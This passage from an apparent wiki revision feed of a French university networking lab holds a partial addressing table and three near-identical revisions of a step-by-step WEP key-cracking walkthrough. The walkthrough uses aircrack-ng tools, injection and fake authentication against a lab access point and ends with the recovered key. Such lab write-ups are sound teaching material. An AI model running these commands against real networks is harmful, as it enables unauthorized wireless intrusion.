|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.41/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Architecture réseau=&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56135</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56135"/>
				<updated>2021-10-25T13:40:22Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Cablage Réseau */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=VM=&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56134</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56134"/>
				<updated>2021-10-25T13:40:01Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Tests d'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56132</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=56132"/>
				<updated>2021-10-25T13:38:42Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Tests D'intrusions */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	</feed>